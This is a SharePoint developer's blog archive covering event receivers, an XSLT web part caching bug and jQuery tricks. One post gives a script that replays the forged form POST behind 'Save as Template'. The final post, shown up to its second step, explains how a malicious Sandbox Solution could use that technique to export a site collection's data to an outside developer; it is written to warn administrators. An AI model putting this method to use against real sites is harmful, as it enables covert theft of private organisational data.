Jaap Vossers' SharePoint Blog

Just another WordPress.com site

Archive for the ‘SharePoint 2010’ Category

SharePoint Asynchronous Event Receivers and the powershell.exe process

with 5 comments

We recently had a very strange problem with one of our custom Event Receivers in our production SharePoint environment. The Event Receiver implemented the Asynchronous ItemUpdated event. It was used to generate and set a value on one of our fields on the document being updated. The code in the Event Receiver appeared to work most of the time, but would fail on seemingly random occasions, leaving the updated document without the generated field set.

We were struggling to isolate the combination of factors that made it fail. The weirdest thing was that there were no errors to be found in the ULS logs or the Event Log. We added lots of logging and try/catch blocks, but for some reason when the Event Receiver failed it would never enter the catch block, so there was no exception to log.

One key point that helped us with the troubleshooting was that we had noticed that the Event Receiver ALWAYS worked when the document was being updated through the SharePoint web UI. We also had a PowerShell script which was used for bulk updating of documents. This script was scheduled to run at regular intervals using Windows Task Scheduler. It appeared that the issue only occurred when the Updated event was triggered via this scheduled PowerShell script, but even then it still seemed intermittent as it would often work just fine.

We were unable to reproduce the issue at all when calling the ps1 file directly from the PowerShell console. So what was different when the script was run from the Task Scheduler vs directly from the PowerShell console? Well, the Task Scheduler actually calls a BATCH script, which in turn invokes the PowerShell script, firing up a new PowerShell process. This process dies as soon as it finishes executing the ps1 file!

Remember, our Event Receiver is an Asynchronous one, so it would not block the execution of the PowerShell script. The Event Receiver is actually executed on a thread inside the PowerShell process since the ps1 script triggered the Updated event. So, when the PowerShell.exe process dies, it does not seem to wait for any background threads to complete, which in our case causes our Event Receiver to suffer from a sudden death. I was a bit surprised to see this to be honest!

Anyway, I guess one of the reasons why in our case the problem seemed to appear randomly is that only the last document in a batch would be affected, which sometimes meant 1 in a couple of thousand documents. Only recently had users started feeding the script “batches” consisting of just one document, which is what highlighted the problem to us and led to this investigation. We were wondering what had changed recently (we had not touched this part of the code for a while!), since it was all working fine before (or so we thought), but in reality the bug had always been there; it had just never surfaced.

So everyone please beware when invoking PowerShell scripts from BATCH scripts when you have Asynchronous Event Receivers in your SharePoint environment!

What did we do to work around our problem? We just put a little Sleep at the end of our PowerShell script… 🙂

Written by jvossers

February 3, 2014 at 10:10 pm

Using jQuery to submit forms on remote SharePoint admin pages

with one comment

Imagine you need to develop a piece of functionality to extend SharePoint, but the available APIs do not directly allow you to do this for any of the following reasons:

  1. You are not allowed to deploy any server side code
  2. The server side code you can deploy has limited access to the server object model (e.g. Sandbox Solutions in SharePoint 2010).
  3. The API you need to access is private or internal

Consider the following scenario.

For our SharePoint Online site, we want to implement a Web Part that allows us to save the current site as a WSP in the solution gallery. As it’s SharePoint Online, we can’t deploy Farm Solutions, so we will have to deploy it as a Sandbox Solution. Unfortunately, we have limited access to the Object Model on the server, and there is nothing available in the Client Object Model which we can use to save the current site as a template.

Now, if there is an existing administration page that does what we want (in our case /_layouts/savetmpl.aspx does), then technically all we need to do is submit an HTTP POST request to that page with the right HTTP headers and form parameters, and the server will happily process the request, as it has no way of telling whether the request was triggered by a user submitting the form or by something else.

Welcome to the world of stateless protocols.

So we need to find out what the request should look like so that we can use jQuery to build it and issue it as an AJAX request from our own code.


Let’s open up Fiddler. With Fiddler open, we press the button in the browser that submits the form on /_layouts/savetmpl.aspx. After that, we can inspect the form parameters of the HTTP POST request that the browser makes. We are not really interested in the HTTP headers, as the browser will take care of passing any headers related to the current browser session (including the authorization header) to the server when we issue an AJAX request.

[Screenshot: the captured HTTP POST request and its form parameters in Fiddler]

We have three main categories of form parameters.

The first category is made up of parameters that directly map to user input fields.

  • ctl00$PlaceHolderMain$ctl00$ctl00$TxtSaveAsTemplateName
  • ctl00$PlaceHolderMain$ctl01$ctl00$TxtSaveAsTemplateTitle
  • ctl00$PlaceHolderMain$ctl01$ctl01$TxtSaveAsTemplateDescription
  • ctl00$PlaceHolderMain$ctl03$CbSaveData

The second category consists of a set of hidden fields which are used by ASP.NET and SharePoint to do their postback magic, including validation of the form post.

  • __REQUESTDIGEST
  • __VIEWSTATE
  • __EVENTVALIDATION

The third category is “the rest”. This is stuff we are not really interested in, but we still need to send it to the server.

  • MSOWebPartPage_PostbackSource
  • MSOTlPn_SelectedWpId
  • MSOTlPn_View
  • MSOTlPn_ShowSettings
  • MSOGallery_SelectedLibrary
  • MSOGallery_FilterString
  • MSOTlPn_Button
  • MSOSPWebPartManager_DisplayModeName
  • MSOSPWebPartManager_ExitingDesignMode
  • MSOWebPartPage_Shared
  • MSOLayout_LayoutChanges
  • MSOLayout_InDesignMode
  • MSOSPWebPartManager_OldDisplayModeName
  • MSOSPWebPartManager_StartWebPartEditingName
  • MSOSPWebPartManager_EndWebPartEditing
  • _maintainWorkspaceScrollPosition
  • __spText1
  • __spText2

It’s easy to determine what we want to submit as values for the first category. We either capture these values in our custom UI, or we have some logic in our code that determines these values for us.

The second category is a bit more difficult. Essentially, the server is expecting us to post back these values, which were provided by the server and rendered on the page as hidden input fields at the time of requesting the page which has the form on it. This means we need to make an initial GET request using jQuery so we can extract the values from the form, before we can submit them in our post.

The third category is easy, as we can copy the values from the request we captured with Fiddler.

The script

Following the instructions above, we can write a bit of JavaScript like this to allow us to submit forms on “remote” pages.

function CreateWSP(callback) {

    var sitePrefix = "/";

    if (_spPageContextInfo.siteServerRelativeUrl != "/") {
        sitePrefix = _spPageContextInfo.siteServerRelativeUrl + "/";
    }

    var url = sitePrefix + "_layouts/savetmpl.aspx";

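    // Initial GET to savetmpl.aspx so we can extract the hidden ASP.NET fields from its form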
    $.get(url, function (data, textStatus, XMLHttpRequest) {

        var ctx = $(data);

        var rd = ctx.find("[name='__REQUESTDIGEST']").val();
        var vs = ctx.find("[name='__VIEWSTATE']").val();
        var ev = ctx.find("[name='__EVENTVALIDATION']").val();

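        // Form parameters as captured with Fiddler, plus the hidden field values we just extracted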
        var postParams = {
            "MSOWebPartPage_PostbackSource": "",
            "MSOTlPn_SelectedWpId": "",
            "MSOTlPn_View": "0",
            "MSOTlPn_ShowSettings": "False",
            "MSOGallery_SelectedLibrary": "",
            "MSOGallery_FilterString": "",
            "MSOTlPn_Button": "none",
            "MSOSPWebPartManager_DisplayModeName": "Browse",
            "MSOSPWebPartManager_ExitingDesignMode": "false",
            "__EVENTTARGET": "ctl00$PlaceHolderMain$ctl02$RptControls$BtnSaveAsTemplate",
            "__EVENTARGUMENT": "",
            "MSOWebPartPage_Shared": "",
            "MSOLayout_LayoutChanges": "",
            "MSOLayout_InDesignMode": "",
            "MSOSPWebPartManager_OldDisplayModeName": "Browse",
            "MSOSPWebPartManager_StartWebPartEditingName": "false",
            "MSOSPWebPartManager_EndWebPartEditing": "false",
            "_maintainWorkspaceScrollPosition": "0",
            "__REQUESTDIGEST": rd,
            "__VIEWSTATE": vs,
            "__SCROLLPOSITIONX": "0",
            "__SCROLLPOSITIONY": "0",
            "__EVENTVALIDATION": ev,
            "ctl00$PlaceHolderMain$ctl00$ctl00$TxtSaveAsTemplateName": "VossersTeamSite.wsp",
            "ctl00$PlaceHolderMain$ctl01$ctl00$TxtSaveAsTemplateTitle": "Vossers Team Site",
            "ctl00$PlaceHolderMain$ctl01$ctl01$TxtSaveAsTemplateDescription": "Vossers Team Site Template",
            "ctl00$PlaceHolderMain$ctl03$CbSaveData": "on",
            "__spText1": "",
            "__spText2": ""
        };

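        // POST the form back to savetmpl.aspx; the server processes it as if the user had clicked the Save button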
        var options = {
            url: url,
            type: "POST",
            data: postParams,
            success: function (data, textStatus, XMLHttpRequest) {

                callback();

            }
        };

        $.ajax(options);

    }, "html");
}
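
To give an idea of how this might be wired up (the callback body below is purely illustrative), CreateWSP could be called from our own UI like this:

// Hypothetical usage: kick off the save and report back once the POST has completed
CreateWSP(function () {
    alert("Save as Template request completed - check the Solution Gallery for the WSP.");
});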

Things to consider

When the page you are posting to is modified, for example by a SharePoint update, then it’s possible that your script breaks due to changes in form parameter names. This makes this technique a bit fragile. For this reason I recommend that you only consider using this technique once you have confirmed that it’s not possible to achieve what you want by using public APIs.

Written by jvossers

February 4, 2012 at 3:22 pm

How the XsltListViewWebPart in SharePoint 2010 can be a real performance killer

with 32 comments

This article describes how the out-of-the-box XsltListViewWebPart, XLV in short, can cause performance problems, sometimes up to the point where pages being served to users are hitting the ASP.NET execution timeout (110 seconds by default).

The XLV is a Web Part that was introduced in SharePoint 2010 as the replacement for the ListViewWebPart. The most important feature of the XLV is the ability to use a custom XSLT style sheet to customise the rendering of the list data surfaced through the XLV. On the project I am currently working on, we are making extensive use of this technique. It turns out that this has been the main cause of the – seemingly random – performance problems we have been experiencing on our production environment for the last couple of months. One day it completely got out of hand, and for the majority of the working day our 3000 users were getting request timeouts and were simply unable to load most of the pages in our portal. As a result, with support from a few colleagues, I have spent about 2 weeks trying to get to the bottom of this problem, which involved extensive analysis of the ULS logs, IIS logs, Content Database, Performance Counters and a lot of reflected SharePoint code. By the end, I had come up with a set of steps to reproduce the problem on a vanilla SharePoint environment and had gained a better understanding of the internal workings of the XLV; enough to explain why it’s doing what it does. Keep on reading if you are interested in finding out more. Warning: this article contains code.

So – what are the ingredients?

  1. a SharePoint 2010 Publishing Site
  2. One or more XsltListViewWebParts with the XslLink property set to point to an XSLT file
  3. Multiple Web Front End servers

What are the symptoms?

  • A variable increase in response times for pages with XLVs using XslLink; sometimes hardly noticeable, sometimes so bad that the request will time out.

Why? What? How?

In short, the problem is related to this thing called XSLT compilation which happens on the Web Front Ends at runtime. There seems to be a bug in the XLV that’s causing it to discard the compiled XSLT from its cache when it should be keeping it.

Compilation of XSLT is quite an expensive operation, which is why the XLV is meant to cache the result so that the XSLT doesn’t have to be recompiled for every subsequent request. The time it takes to compile an XSLT style sheet seems to depend on its contents: compiling large style sheets takes longer than compiling small ones. On our environment we’ve got fairly large XSLT style sheets, and it’s not uncommon for a single compilation to take 2 seconds.

Why is it a problem if the Web Front End servers are busy compiling XSLT style sheets all the time? Have a look at the following reflected code (obtained using ILSpy, an open-source alternative to .NET Reflector).

[Reflected code: the lock around the call to AppDomainHelper.DoSerialize()]

The developers amongst you will understand that the call to AppDomainHelper.DoSerialize() is wrapped in a lock, meaning that XSLT compilation is something that can only be done by one thread at a time.

This funnel becomes a massive bottleneck when compilation cannot keep up with the compilation requests coming in, as they will form a growing queue of threads blocked at Monitor.Enter(). As the queue of blocked threads keeps growing, the amount of time that each individual thread has to wait goes up. Imagine for a moment what this will do to page response times.

Not to mention that the compilation of XSLT is actually performed in a separate AppDomain, whose lifetime is managed by SharePoint. For some reason, once this AppDomain has served a total of 100 compilation requests, SharePoint decides to unload the AppDomain and create a new one. This is also an expensive operation and gives the queue of blocked threads the opportunity to grow even more.


To back up this theory, have a look at the following SCOM chart, which presents the “Total appdomains unloaded” performance counter for each of our Web Front End servers over a period of 24 hours. The counter gets reset after an Application Pool recycle, hence the drops after midnight.

[SCOM chart: the “Total appdomains unloaded” performance counter for each Web Front End server over 24 hours]

It shows that it’s quite likely that our Web Front End servers are busy compiling XSLT all the time, causing an increase in response times for all requests to pages containing an XLV with XslLink set.

Let’s go back to our scenario where we experienced those severe performance issues for a whole day. The queue of threads waiting for the lock to be released had grown so much that we had threads waiting long enough for ASP.NET to decide it was time to throw in the towel for that request. When the ASP.NET execution timeout is hit, ASP.NET will throw a ThreadAbortException on the thread that is handling the request.

The picture below shows a filtered set of entries from a ULS log file containing 12 minutes’ worth of logs at Verbose level from a single Web Front End, captured during the period when we were experiencing our severe performance problems. The definition of the filter that is applied is Where [Message] Contains “Monitor.Enter”.

[Screenshot: filtered ULS log entries containing “Monitor.Enter”]

476 timeouts in 12 minutes, that’s about 40 per minute.

The nice thing about these entries in the ULS logs is that we can tell which method the thread was executing when the ThreadAbortException was thrown by ASP.NET because they contain a Stack Trace, and as you can see in the screenshot above, these threads were all “executing” Monitor.Enter(), i.e. they were blocked, waiting for the lock to be released.

Why are the XLVs compiling the XSLT all the time? Aren’t they supposed to cache the result and reuse it? You’d think so. Let’s have a good look at the Stack Trace we’ve got that leads to the call to Monitor.Enter(), as I am pretty sure that somewhere in the call stack a decision was made not to use a cached version of the compiled XSLT.

Error while executing web part: System.Threading.ThreadAbortException: Thread was being aborted.
at System.Threading.Monitor.Enter(Object obj)
at Microsoft.SharePoint.WebPartPages.BaseXsltListWebPart.GenerateCustomizedXsl(BaseXsltInfo baseXsltInfo)
at Microsoft.SharePoint.WebPartPages.BaseXsltListWebPart.get_CustomizedXsl()
at Microsoft.SharePoint.WebPartPages.BaseXsltListWebPart.LoadXslCompiledTransform(WSSXmlUrlResolver someXmlResolver)
at Microsoft.SharePoint.WebPartPages.DataFormWebPart.GetXslCompiledTransform()
at Microsoft.SharePoint.WebPartPages.DataFormWebPart.PrepareAndPerformTransform(Boolean bDeferExecuteTransform)

Note that the XsltListViewWebPart derives from BaseXsltListWebPart which in turn derives from DataFormWebPart.

DataFormWebPart.GetXslCompiledTransform() contains logic which decides whether BaseXsltListWebPart.LoadXslCompiledTransform() should be called or not. It only calls this method if it was unable to retrieve the compiled XSLT from its cache. Note that the DataFormWebPart uses HttpContext.Current.Cache as its “first level” of caching for the compiled XSLT (I will explain later why I call it “first level”).

So by the looks of it, the XLV was consistently unable to retrieve any compiled XSLT from the HttpContext.Current.Cache? Did it fail to add it to the cache the last time it compiled the XSLT, or has it perhaps been removed from the cache since it’s been added?

Let’s have another look at the same ULS file we looked at earlier. We’ve got the following suspicious entries. The definition of the filter that is applied is Where [Message] Contains “InvalidateAll”.

[Screenshot: filtered ULS log entries containing “InvalidateAll”]

Not a very descriptive message you’d say, but descriptive enough to suspect it might be clearing some kind of cache for whatever reason.

ILSpy agrees.

[Reflected code: MemoryPartCache.InvalidateAll()]

What is the MemoryPartCache class? And what is it removing from the cache exactly?

The Microsoft.SharePoint.WebPartPages.WebPart class exposes the protected methods PartCacheRead() and PartCacheWrite(), which internally use an object that derives from the abstract Microsoft.SharePoint.WebPartPages.PartCache class. Depending on what’s configured in the web.config, either an instance of MemoryPartCache or DatabasePartCache will be used. With the default web.config for SharePoint, an instance of MemoryPartCache will be used.


Let’s drill down into the constructor of MemoryPartCache.

[Reflected code: the MemoryPartCache constructor]

Two things are interesting here. First of all, the call to BuildDependsKeys(), which appears to build the value for this.dependStringKey, the key of the object that is being removed in the InvalidateAll() method we looked at earlier. Let’s have a look at that first, before we look at what the EnsureDependsKeyValid() method does.

[Reflected code: MemoryPartCache.BuildDependsKeys()]

Assuming the Web Part for which this MemoryPartCache object is being created has a StorageKey (Web Part ID), it will build a string with two “dynamic” elements; the Storage Key and the id of the SPSite. This implies there is a one-to-one relationship between an instance of Microsoft.SharePoint.WebPartPages.WebPart and such a key. Let’s remember this and find out where else this key is being used.


Before we have a look at EnsureDependsKeyValid(), let’s look at the Add() method. The MemoryPartCache.Add() is called when PartCacheWrite() is called on Microsoft.SharePoint.WebPartPages.WebPart. Whatever object needs to be added to the cache will be passed into MemoryPartCache.Add() as a method parameter named “data”. On line 59, at the very bottom of the bit of code below, you can see that the “data” object is being added to the cache. But hold on, it is being added with a CacheDependency! The CacheDependency that is being passed in is based on a string array, which means that it establishes a dependency on other object(s) in the cache, with the array items representing the key(s) of the “master” item(s). In this case we are only dependent on a single “master” item. This “master” item itself is added to the cache on line 30, if it didn’t already exist (which is tested on line 24). The interesting bit here is that the “master” item’s key is in fact this.dependentStringKey, which means that whenever MemoryPartCache.InvalidateAll() is called for a Web Part, its “master” item will be removed from the cache, along with any other “child” items that have been added through MemoryPartCache.Add().

[Reflected code: MemoryPartCache.Add()]

We had already proven that InvalidateAll() is getting called quite a bit, so it’s possible that other cached objects are being removed from the cache as a result of that.

Let’s have a look at MemoryPartCache.EnsureDependsKeyValid(), which is also being called from within the MemoryPartCache constructor.

[Reflected code: MemoryPartCache.EnsureDependsKeyValid()]

We are getting closer. So in certain circumstances InvalidateAll() will be called, which essentially does pretty much what it says it does: remove the master item from the cache, along with any other objects in the cache related to this particular Web Part. What exactly is it testing in the if statement on line 6? It is comparing the result of the call to this.GetDepencyKeyHash() to the value of the cached “master” item, which, at the time of adding, also held the return value of a call to this.GetDepencyKeyHash(), as can be seen on line 30 in MemoryPartCache.Add(), above.

Let’s have a look at what GetDepencyKeyHash() does.

[Reflected code: GetDepencyKeyHash()]

Aha! It looks at the Web Part version.

In a nutshell this means that whenever a web part version changes, any cache stored against other (previous) versions of that web part, will be cleared.

The version of a Web Part is not exposed through a public API, so if you want to see it you need to either write code which uses reflection to read the internal Version property of Microsoft.SharePoint.WebPartPages.WebPart, or you can have a quick peek in the Content Database. Note that you should never touch the Content Database on a production environment, which is why you should back up the database and restore it elsewhere before you start running queries against it.

As I was exploring the Content Database, I spotted the tp_Version column on the AllWebParts table. When I selected all rows from the AllWebParts table and ordered them by tp_Version in descending order, I found that some of our web parts had versions greater than 100,000, which is pretty suspicious I must say!

Let’s summarise what information we’ve got so far.

  1. Web Part versions are incrementing A LOT for some unknown reason
  2. Objects stored in Web Part Cache are being cleared every time a Web Part version changes
  3. XLVs seem to be unable to retrieve compiled XSLT from the cache, with recompilation of the XSLT as a result, causing a variable increase in response times

Even though the compiled XSLT itself is not stored using the Web Part Cache, another object, of type CloneableHashtable, is. This object is added to and retrieved from the Web Part Cache to facilitate the retrieval of the compiled XSLT, by taking part in the process of building the cache key required to retrieve the compiled XSLT. This means that when InvalidateAll() is called and the Web Part’s “master” object is removed from the cache, so is this CloneableHashtable, as it’s dependent on the Web Part’s “master” object. As a result, the XLV cannot retrieve the CloneableHashtable from the cache (as it does not exist anymore), and consequently it cannot build the cache key that is required to retrieve the compiled XSLT from the cache. This logic is defined in Microsoft.SharePoint.WebPartPages.DataFormWebPart.GetXslCompiledTransform().

Why are the Web Part versions being incremented automagically?

Remember I mentioned a “first level” of caching earlier? Well, there is a second level of caching of the compiled XSLT, in the content database, in the tp_Cache column of the same AllWebParts table. The way I understand this is SUPPOSED to work is that if you have multiple Web Front End servers, the first server to serve a page with a new XLV with XslLink on it does the compilation, first adds the compilation result to its own cache as described above, and then also saves it to the database (line 32, below), so that all the other Web Front End servers in the farm can reuse it.

Pretty clever.

Too bad it doesn’t work.

[Reflected code: the database write, with SaveChanges() on line 31 and CacheWriteInternal() on line 32]

The call to CacheWriteInternal on line 32 results in a call to a Stored Procedure called proc_UpdateWebPartCache. However, the value passed in to the VarBinary @Cache parameter of the Stored Procedure does not contain any data, as can be observed in the Developer Dashboard.

[Screenshot: Developer Dashboard showing the call to proc_UpdateWebPartCache with an empty @Cache parameter]

Also, if you run a trace with SQL Server Profiler whilst CacheWriteInternal() is being called, you can see the call to proc_UpdateWebPartCache, and you can see that a NULL value was passed as the value for the @Cache parameter.

To confirm the database really didn’t receive the compilation result, we can run a select query on the AllWebParts table. It shows only NULL values in the tp_Cache column. Essentially, it’s not saving the compiled XSLT to the database properly.

What it did do, just before it called CacheWriteInternal(), was make a call to SaveChanges() on line 31. And guess what that does. It calls a Stored Procedure called proc_UpdateWebPart, and one of the many things this Stored Procedure does is increment the Web Part version!


What would have happened if the compiled XSLT would have been saved to the database successfully?

Let’s have a look at the definition of PartCacheUpdate(), which is overridden in the Microsoft.SharePoint.WebPartPages.BaseXsltListWebPart class, the base class for the XLV.

[Reflected code: BaseXsltListWebPart.PartCacheUpdate()]

Now the name of this method is a bit confusing, but what it really is, is a mechanism that allows the WebPartManager to “inject” the value of the tp_Cache column from the AllWebParts table into the Web Part that owns the cache, at the time of instantiating the Web Part as a Control on the page, somewhere fairly early on in the page lifecycle. So IF the tp_Cache column had held a value other than null, we would have captured it in the this._customizedXsl field on line 7.

Now let’s go back to a bit of code we looked at just a moment ago.

[Reflected code: the logic that decides whether GenerateCustomizedXsl() needs to be called]

Notice the if statement on line 9, where it tests if this._customizedXsl is null. Assuming we had received it from the database via the WebPartManager, there would have been no call to this.GenerateCustomizedXsl() and we would have successfully reused the compilation result from another Web Front End server.

There is however a caveat. Even if we did receive the compiled XSLT from the database, there is a “second chance” to recompile when the if statement on line 18 is satisfied. The BaseXsltHashKey property on the XLV holds a string containing a list of filenames of .xsl files that live in the TEMPLATE\LAYOUTS\XSL folder and their last modified times. The if statement on line 18 tests whether the value stored in the Web Part is the same as the one it just calculated by checking the files on the file system of the Web Front End serving the current request. If they are different, SharePoint thinks you just deployed a new .xsl file and it’s time to recompile.

What this means is: if, for some reason, the list of .xsl files contained in the TEMPLATE\LAYOUTS\XSL folder and their last modified times are not exactly the same across all Web Front End servers, you will have a problem. SharePoint will keep detecting a difference between the value stored in the Web Part property and the calculated values, as the Web Part property keeps getting updated with the calculated value from the Web Front End server that last detected a difference, and the never-ending ping pong game has started.

We have seen scenarios where a standard WSP deployment of .xsl files into the TEMPLATE\LAYOUTS\XSL folder sometimes caused files to be deployed or updated with timestamps that were not exactly the same across all Web Front End servers in the farm, i.e. a difference of a single second. This is enough for SharePoint to start playing the never-ending ping pong game. I must say that I have not seen this kind of odd behaviour with WSP deployments before, so I am not sure if this is something environmental or something that affects everyone.

Overview

For a quick overview of the overall flow described in this article, please refer to the following diagram.

[Diagram: overview of the XSL compilation flow]

The main question

Why does the call to CacheWriteInternal() result in a Stored Procedure call with a NULL value for the @Cache parameter? I would love to know.

What’s next?

I am planning to write a follow-up blog post on this topic soon, in which I will describe a workaround that has solved the problem for us. Some of our worst hit pages went from an average of 8 second response times to less than a second.

Also, I have been in touch with Microsoft, and they have been able to reproduce the issue on their end. I am waiting to hear back from them.

Thanks

I would like to thank my colleagues and mates Nick Mulder, Glyn Clough, Steve Kay, Andres Ramon, and Kristof Kowalski for their help and great ideas.

How to reproduce

For those wanting to reproduce the issue on their own environment, you can do so by following these steps.

  1. Create a hosts file entry to point to 127.0.0.1 for the hostname “xlv” on each Web Front End.
  2. Create a new Web Application using mostly default settings:
    1. Claims Mode
    2. New IIS website
      1. Port 80
      2. Hostname “xlv”
    3. New Content Database
  3. Create a new root Site Collection under new Web Application
    1. Template: Publishing Portal
  4. Edit /Pages/default.aspx
    1. Remove all existing web parts
    2. Add new Web Part to page
      1. Lists and Libraries > Pages
    3. Edit newly added Web Part
      1. Property: Miscellaneous > XSL Link
      2. Value: /_layouts/XSL/main.xsl
    4. Check in and publish /Pages/default.aspx
  5. Turn on Developer Dashboard with TraceEnabled=True and click “Show or hide additional tracing information . . .” at the bottom of the page to show additional tracing information.
  6. Open an RDP session to two of the Web Front Ends (let’s call them WFE1 and WFE2)
  7. On WFE1, Request http://xlv/Pages/default.aspx
  8. On WFE2, Request http://xlv/Pages/default.aspx
  9. On WFE1, Request http://xlv/Pages/default.aspx
    1. Confirm the text “InvalidateAll” appears on the page in the additional tracing information
    2. Confirm that in the list of Database Queries on the Developer Dashboard the following entries exist:
      1. DECLARE @DN nvarchar(256), @LN
      2. proc_UpdateWebPartCache
        1. Confirm that the “Size” of the @Cache parameter is 0
  10. On WFE1, refresh the page a number of times
    1. Confirm the text “InvalidateAll” does NOT appear on the page in the additional tracing information
    2. Confirm that in the list of Database Queries on the Developer Dashboard the following entries do NOT exist:
      1. DECLARE @DN nvarchar(256), @LN
      2. proc_UpdateWebPartCache
  11. On WFE2, Request http://xlv/Pages/default.aspx
    1. Confirm the text “InvalidateAll” appears on the page in the additional tracing information
    2. Confirm that in the list of Database Queries on the Developer Dashboard the following entries exist:
      1. DECLARE @DN nvarchar(256), @LN
      2. proc_UpdateWebPartCache
        1. Confirm that the “Size” of the @Cache parameter is 0
  12. On WFE2, refresh the page a number of times
    1. Confirm the text “InvalidateAll” does NOT appear on the page in the additional tracing information
    2. Confirm that in the list of Database Queries on the Developer Dashboard the following entries do NOT exist:
      1. DECLARE @DN nvarchar(256), @LN
      2. proc_UpdateWebPartCache
  13. Run the following SQL query on the Content Database for the xlv Web Application
    1. SELECT wp.* FROM AllWebParts wp INNER JOIN AllDocs doc ON wp.tp_PageUrlID = doc.Id WHERE doc.DirName = 'Pages' AND doc.LeafName = 'default.aspx' AND wp.tp_IsCurrentVersion = 1
    2. Confirm the value for the tp_Cache column of the only row returned is NULL
  14. Repeat step 9 to step 12 a number of times
    1. Rerun the query in step 13.1 and confirm the value for tp_Version is incremented by one every time you reload the page and “InvalidateAll” appears on the page in the additional tracing information.

Written by jvossers

January 28, 2012 at 12:53 pm

Posted in SharePoint 2010

SharePoint InlineSiteSettings 2010 – improved productivity for Administrators and Developers

leave a comment »

After having released SharePoint InlineSiteSettings for SharePoint 2007 a while ago, and having used a little desktop application called Launchy, which starts desktop applications with just a few keystrokes, I decided to build an enhanced version of InlineSiteSettings, built for SharePoint 2010 with features similar to Launchy’s.

The end result is SharePoint InlineSiteSettings 2010, which can be downloaded from CodePlex at http://sitesettings2010.codeplex.com/

[Screenshot: SharePoint InlineSiteSettings 2010]

The purpose of the solution is to improve productivity for SharePoint 2010 users who regularly access the Site Settings page, i.e. SharePoint Administrators and SharePoint Developers. It allows them to access the Site Settings in a dialog by pressing Ctrl+s, so no need to move your mouse to Site Actions, click it, click Site Settings, and wait for the full page to load.

As we all know, once the Site Settings page has been loaded, it can actually take a few seconds to spot the link you are looking for (as the links are not listed in alphabetical order). So, what’s new in this version of SharePoint InlineSiteSettings is that users can start typing the title of the link they wish to navigate to, and with real-time filtering functionality, all links that do not match your filter will disappear from view. In addition to that, as soon as exactly one link is left that matches your filter, it will automatically redirect you to that page, as can be seen in the demo screencast below. As a result, navigating between administrative pages in SharePoint 2010 will be less painful.

SharePoint InlineSiteSettings 2010 is packaged as a Sandbox Solution, and does not depend on any server side code. The good thing about this is that it works on SharePoint Online (Office365).

Download SharePoint InlineSiteSettings 2010 from CodePlex

Written by jvossers

May 8, 2011 at 9:59 pm

Bypass caching with jQuery AJAX GET requests

with one comment

As I seem to use this trick quite often and I keep forgetting the exact details on how to implement it, I thought it would be good to document this.

Using jQuery, I often make asynchronous GET requests to a custom ASHX handler in SharePoint’s _layouts folder which returns some data that I want to display. This data is always dynamic, but sometimes the browser tries to cache the result of the previous request, so you might not get the response you expected.

To avoid this, simply make the URL for each request unique by adding a timestamp to it in JavaScript.

var url = '/_layouts/MyProject/MyHandler.ashx?unique=' + new Date().getTime();
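
As a side note, jQuery can also do this for you: setting the cache option to false on $.ajax() appends a similar timestamp parameter to GET requests. A quick sketch, using the same example handler URL:

$.ajax({
    url: '/_layouts/MyProject/MyHandler.ashx',
    type: 'GET',
    cache: false, // jQuery appends a "_=<timestamp>" parameter so the browser cannot serve a cached response
    success: function (data) {
        // do something with the fresh response data
    }
});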

Written by jvossers

January 11, 2011 at 10:41 am

Malicious Sandbox Solutions in SharePoint 2010 – my private data has been stolen!

with 4 comments

We all know about the existence of Sandbox Solutions in SharePoint 2010 and why you would want to use them. We also know that server side code running in the Sandbox is very restricted. Things like accessing the server’s file system, using the SPSite constructor, sending e-mails and making web requests, plus loads of other actions, cannot be performed when running in the Sandbox, for the sake of security.

It is easy to start thinking that Sandbox Solutions cannot do too much harm and that any damage done stays within the walls of the Site Collection. The aim of this blog post is to bust this myth and make people aware that they are still responsible for validating the contents of any Sandbox Solution they activate on their Site Collection.

What if I told you I have developed a Sandbox Solution that upon activation collects documents and list data from your site collection and sends it to me, the evil developer, outside your Site Collection walls? Would you be surprised to hear this is possible? I think many people would be.

It is possible.

  1. Evil Dev produces Malicious Sandbox Solution
  2. Site Collection Admin uploads and installs Malicious Sandbox Solution
  3. Malicious Sandbox Solution collects private data from the Site Collection and sends it to Evil Dev

[Diagram illustrating the three steps above]

Now it’s time to see it in action.

For obvious reasons I will not post the full source code, but I am happy to explain how it works.

I am assuming all of the code runs under the context of a Site Collection Administrator.

Note that the following “solution” does NOT depend on the fact that it runs in a Sandbox. In fact, as Jan Tielens has kindly pointed out, the same result could be achieved with a JavaScript only solution.

Step 1 – Save site as a template through JavaScript in the background
Let’s leverage the “Save as Template” functionality as used in /_layouts/savetmpl.aspx to produce a WSP that contains the site with all its contents, including documents in document libraries and lists with data. The first hurdle we need to get past is to figure out how we are actually going to achieve this, since SPSolutionExporter.ExportWebToGallery() is not available in Sandbox Solutions. One way to hack around this is to use jQuery to perform an AJAX POST to /_layouts/savetmpl.aspx, providing all the POST parameters that it expects. Remember, HTTP is stateless. We need to perform an initial AJAX GET to /_layouts/savetmpl.aspx to obtain the values of __REQUESTDIGEST, __VIEWSTATE and __EVENTVALIDATION so we can trick ASP.NET into thinking that the POST we are about to perform originates from a user looking at /_layouts/savetmpl.aspx in his browser. All the other post parameters that the page expects to receive as part of a POST can be obtained using Fiddler as we perform a manual form submit through the browser on /_layouts/savetmpl.aspx.
All of our JavaScript code will run on a custom Web Part page that is loaded inside an iframe, except for the bit of JavaScript that is responsible for creating this iframe. This Web Part page plus the custom Web Part that lives on this page have been deployed to our Site Collection using Features that reside in our malicious Sandbox Solution. A Feature containing a CustomAction with Location=”ScriptLink” takes care of loading our JavaScript file on every page.
Once we have the JavaScript in place to initiate the creation of the template, we need to wait for the process to complete. Lucky for us, the /_layouts/savetmpl.aspx page blocks until it has finished producing the template, so we know that when the callback of our AJAX POST is called we are ready to rock. In the next step I will explain why it’s important for the script to be informed when the page has finished creating the template.

Step 2 – Get access to saved template data in JavaScript code
